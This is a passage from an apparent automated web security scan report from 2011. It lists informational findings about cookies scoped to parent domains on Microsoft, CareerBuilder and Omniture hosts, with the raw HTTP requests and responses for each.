P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAC+BgAA/LKUz1RDYrDrBIShzmD0CQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Content not fou
...[SNIP]...

16.140. http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/cc838158(VS.95).aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAAAvCAAAAHhoQDRGOCpGUJGGvUjPzg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/
A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/cc838158(VS.95).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29998
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAAAvCAAAAHhoQDRGOCpGUJGGvUjPzg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: TocHashCookie=ms310241(n)/aa139615(n)/cc838813(VS.95,n)/; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Silverlight

</
...[SNIP]...

16.141. http://msdn.microsoft.com/en-us/library/ff637515(VS.92 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/ff637515(VS.92

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAACxBwAAsl7l0ihNIHEg4m248bhSNg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14228
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAACxBwAAsl7l0ihNIHEg4m248bhSNg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Content not fou
...[SNIP]...

16.142. http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/library/ff637515(VS.92).aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAACeBwAAfX4UyXJKIqHwEP+0sulhJA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/
A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/library/ff637515(VS.92).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21669
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAACeBwAAfX4UyXJKIqHwEP+0sulhJA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: TocHashCookie=ms310241(n)/aa187916(n)/ff403849(VS.92,n)/na/; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Design Resource
...[SNIP]...

16.143. http://msn.careerbuilder.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=3f30430db87e4e269a85cb0eeebc1aac-349650951-x6-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X1974D75CFDC14C842D559454AB8AE26C0EE1866FEBFDE6D9E24188B0257E60F8847335758E3A1239E4168099294A9A3E8; domain=.careerbuilder.com; expires=Mon, 30-Jan-2012 02:15:51 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 0
Location: http://msn.careerbuilder.com/msn/default.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=3f30430db87e4e269a85cb0eeebc1aac-349650951-x6-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842D559454AB8AE26C0EE1866FEBFDE6D9E24188B0257E60F8847335758E3A1239E4168099294A9A3E8; domain=.careerbuilder.com; expires=Mon, 30-Jan-2012 02:15:51 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEBTEST1
Date: Sun, 30 Jan 2011 02:15:51 GMT
Connection: close

16.144. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=217c15685a7947bc834d222ac5644fdb-349642135-XJ-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X1974D75CFDC14C842A95BF216FF78EBA0B15DE7242A948C767593FFCBD9946DC3EE96BBC153A559E56DD81A338B99D40F; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.145. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=1376ce83848c458bad9f9645f4c3cfa3-349642136-XH-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X1974D75CFDC14C842F532F2B54CCD51E8D85817405B60EDB414DD584DBAE145C363A33CFCCCD28ABE3843C2AB1513C2FD; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.146. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=395818babba7496ca7f1ec46d56b6afc-349642127-XB-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X1974D75CFDC14C8425FF500443C942BAF241B9E407CBF4C42B5FD4C39911286DBFFBA30E2FAA02C46E8E850F0AD333FE8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.147. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=3eb01fb472e34dfbb522cdac313c9679-349642137-w6-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X1974D75CFDC14C84271DBE1DDB3CC2075D4566E934132B9FE8F5A3AD8D64E2A0E08564952FD43F1D0830940A7662B16DF; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.148. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/jobseeker/jobs/jobResults.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=fce2ee8d67554dafa8996a80449bf770-349642143-XI-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X1974D75CFDC14C842AF27C9499CC36681A09DA126FC89CDE67D6CB317A39CA4DEA45CDDE40FA597B269AF1D1F84882078; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:02 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobseeker/jobs/jobResults.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.149. http://msn.careerbuilder.com/msn/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/msn/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=a1015ecbf19144f8ae5b365846c3aa34-349642122-XC-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X1974D75CFDC14C842F6D25E611765960B75D9DDF2256A2305A68D4A4064297C578D46EDCBE5C2F36EC73EE09F4CCCAF3E; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:42 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /msn/default.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.150. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbc.112.2o7.net
Path:	/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:22:03 GMT
Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www383
Content-Length: 0
Content-Type: text/plain
Connection: close

16.151. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbc.112.2o7.net
Path:	/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:21 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 02:16:21 GMT
Last-Modified: Mon, 31 Jan 2011 02:16:21 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www391
Content-Length: 0
Content-Type: text/plain
Connection: close

16.152. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbc.112.2o7.net
Path:	/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:22:03 GMT
Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www598
Content-Length: 0
Content-Type: text/plain
Connection: close

16.153. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.154. http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0} previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnportal.112.2o7.net
Path:	/b/ss/msnportalhome/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalhome/1/H.7-pdv-2/{0} HTTP/1.1
Host: msnportal.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:50:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/
Location: http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Fri, 28 Jan 2011 23:50:09 GMT
Last-Modified: Sun, 30 Jan 2011 23:50:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain
Connection: close

16.155. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0} previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnportal.112.2o7.net
Path:	/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalusenmoney/1/H.7-pdv-2/{0} HTTP/1.1
Host: msnportal.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|2693B20C05013B68-4000010D20126E16|dinydefxxelh|2696E365851591F8-40000180E0024F83[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/
Location: http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 02:16:45 GMT
Last-Modified: Mon, 31 Jan 2011 02:16:45 GMT
